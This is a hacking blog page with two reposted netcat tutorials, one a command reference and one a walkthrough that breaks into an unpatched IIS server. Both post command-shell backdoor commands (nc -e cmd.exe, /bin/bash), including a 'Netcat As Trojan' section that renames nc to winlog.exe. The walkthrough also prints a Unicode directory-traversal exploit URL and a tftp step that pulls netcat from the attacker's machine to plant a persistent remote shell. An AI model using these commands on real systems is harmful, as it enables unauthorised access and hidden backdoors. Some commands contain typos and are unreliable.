Green Hackerz: May 2012

Hello GreenHackers...

In This Article We'll Discuss about NETCAT Commands & Use. For Those People Who Don't Know About NETCAT Must Read My Previous Post NETCAT | BEGINNER GUIDE ..

Okay So Let's Start..

Important Switches

-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]

Netcat Connecting

Run nc in connect mode and connect to port 139

nc -p 31337 127.0.0.1139

Run nc in connect mode and connect to port 139 and give verbose display -v -v two times make more verbose

nc -v -v -p 31337 127.0.0.1 139

Run nc in connect mode and connect to port 139 with TIMEOUT set to 5

nc -w 5 -p 31337 127.0.0.1 139

Run nc in connect mode and connect to port 139 with TIMEOUT set to 5 and give verbose display

nc -v -v -w 5 -p 31337 127.0.0.1 139

Netcat Execute

-e Executes a program if netcat is compiled with the – DGAPING_SECURITY_HOLE.

Nc.exe is compiled to execute when -e is used.

Example

nc-l -d -p 10000 -e cmd.exe or

nc-L -d -p 10000 -e cmd.exe

This will run nc in detached mode and listen on port 10000.

Netcat Listen

Use –L switch to reconnect to the same NetCat sessions.

This way you can connect over and over to the same Netcat process.

Example:

nc -l -p 53 -t -e cmd.exe

nc -l -p 5050 | /bin/bash

nc -v -l -p 5050 -e '/bin/bash'

Netcat File Sending

To receive a file named newfile on the destination system start netcat with the following command:

nc –l –p 1234 >newfile

On the source system send a file named newfile to the destination system with the following command:

nc destinationIP 1234 < newfile

Netcat Banner Grabbing

nc –vvn hostIP 80

nc –vvn hostIP 8080

Once connected type HEAD / HTTP/1.0 [Hit enter twice]

nc -v www.website.com 80 < get.txt

Checking WEB Header.

Your get.txt file will contain:

GET / HTTP/1.0

[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)

[Carriage]

In perl you can use print $socket "GET / HTTP/1.0\n\n";

echo "blahblahblah" | nc hostIP 80 > default.htm

cat get.txt | nc hostIP 80

Netcat Web Banner Grabber

First File is a text file:

----- begin get.txt -----

GET	/ HTTP/1.0
HIT	ENTER IN YOUR	EDITOR
HIT	ENTER IN YOUR	EDITOR

----- end get.txt -----

The second file is a batch file:

----- begin getweb.cmd -----

@echo off

nc -v %1 80 < get.txt > index.txt

notepad index.txt

----- end getweb.cmd -----

You run it like this: getweb.cmd www.someweb.com

Netcat Finger & Telnet

Netcat as a simple finger client:

nc -v hostIP 79 < user.txt

The file “user.txt contains the username you are interested in.

You can also send the output to a log file.

nc -v hostIP 79 < user.txt > log.txt

Run nc in listen mode and answer Telnet negotiation in detached mode.

nc -v -v -L -d 127.0.0.1 -p 23

Netcat Simple Server

To create a simple server

nc -l -p 1234 < file

A very simple web server

nc -L -d -p 80 < file

A simple telnet server with execution

nc -L -d -p 23 -t -e cmd.exe

Netcat As Trojan

We will use –t switch to answer telnet negotiation. Netcat should be compiled with –DTELNET parameter.

nc -l -d -t -p 10000 -e cmd.exe and/or nc-L -d -t -p 10000 -e cmd.exe

winlog.exe -L -d -p 139 -t -e cmd.exe

(note winlog.exe= nc.exe)

Connect to your trojan using

nc -vvn IP_address_of_target port

nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.

nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.

To send netcat on a remote box using tftp

tftp –i remoteip GET nc.exe

This Is Just Some Commands of Netcat to show the power and Versatility of Netcat. I Found This article from the web Written By Adonis a.K.a. NtWaK0..

Enjoy Friends With NETCAT.... @@@@@@@

Hello GreenHackers..

In this article we will discussed about NetCat. NetCat is also known as Swiss Army Knife..

So Let's Start...

Netcat is a utility that is able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it essential that you understand the capabilities of Netcat. Netcat can be used as port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too. It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺ During this tutorial I'll demonstrate a complete hack, using Netcat only, just to point out how versatile it is.

Port scanning with Netcat

A scanning example from Hobbit is "nc -v -w 2 -z target 20-30". Netcat will try connecting to every port between 20 and 30 [inclusive] at the target, and will likely inform you about an FTP server, telnet server, and mailer along the way. The -z switch prevents sending any data to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on. To limit scanning speed if desired, -i will insert a delay between each port probe. Even though Netcat can be used for port scanning it isn’t its strength. A tool such as Nmap is better suited for port scanning.

We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and 25 are open.

Banner Grabbing with Netcat

So we're interested in knowing what's running behind port 80 and 21. We can use Netcat to grab port banners in the following way:

So we know it’s probably a Windows 2000 machine as it's running IIS 5.0 and Microsoft FTP Service.

Let's try to send a malformed URL which attempts to exploit the File Traversal vulnerability in unpatched IIS servers (Pre SP3). We will be using Netcat to Check for the vulnerability, and if found (and it will!), we will upload Netcat to the IIS server and demonstrate how we can use Netcat as a backdoor. If you do not know what the Unicode File traversal exploit is, you can check the "IIS Unicode File Traversal" tutorial, or read it up on the net.

Basically this exploit allows us to "break out" of C:\inetpub\wwwroot and explore and execute Programs anywhere on the attacked machine.

The point here isn't hacking IIS, but the use of NetCat as a Backdoor. Don't get distracted by the whole "Hacking into IIS" thing.

Now we've sent the URL: http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ to the vulnerable IIS server and what we see is a directory listing of the IIS server C drive. Great! Now we want to upload Netcat to the IIS server, so we'll use TFTP and integrate the TFTP commands into the malformed URL.

tftp –I 192.168.1.9 GET nc.exe

Is transformed to:

http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe

Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe file:

Netcat as a BackDoor

So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in order to get a remote command prompt.

In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (lets choose port 10001) and then we can connect to this port from our attacking machine…using Netcat of course!

The command we want to give on the server looks like this:

nc -L -p 10001 -d -e cmd.exe

Here's what that command does:

nc - tells Windows to run the nc.exe file with the following arguments:

-L Tells netcat to not close and wait for connections

-p Specifies a port to listen for a connection on

-d Tells Netcat to detach from the process we want it to run.

-e Tells what program to run once the port is connected to (cmd.exe)

If we now want to convert this command for Unicode URL use, it will look like this:

http://<ExploitURL>/c+nc+-L+-p+10001+-d+-+cmd.exe

Now we will execute Netcat on the remote IIS machine:

This should have started Netcat listening on port 10001 on the IIS machine and should connect the cmd.exe process to the connection stream. From our machine we will try to connect to the Netcat on the IIS server.

We have now "Shoveled a Shell" using Netcat. We effectively have a remote command prompt of the IIS server, as can be seen from the IPConfig.

Transferring files using Netcat

Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don't want to TFTP the file. We can use Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system start Netcat on the IIS

server with the following command:

nc –l –p 1234 >hack.txt

Issue a ^C on the source system and your done. Be sure to check the file to be sure it is the same size as the original.

This is what hack.txt looks like

And it's Done :)

We can see that the file hack.txt has been transferred to the target system, via port

1234.

These are just a few of the wonderful option Netcat has to offer. Definitely worth RTFMing. Imagine all the wonderful possibilities of overcoming firewalls with netcat…

This article is not written by me but i think it is good for beginners

You Can Download NetCat From HERE

If you are having problems due to antivirus programs detecting this as a threat, the following version may be helpful to you. It is compiled with the -e remote execution option disabled. Download from HERE.

Enjoy NetCat....

Green Hackerz

Pages

NETCAT MANUAL | COMMANDS

NetCat | Beginner Guide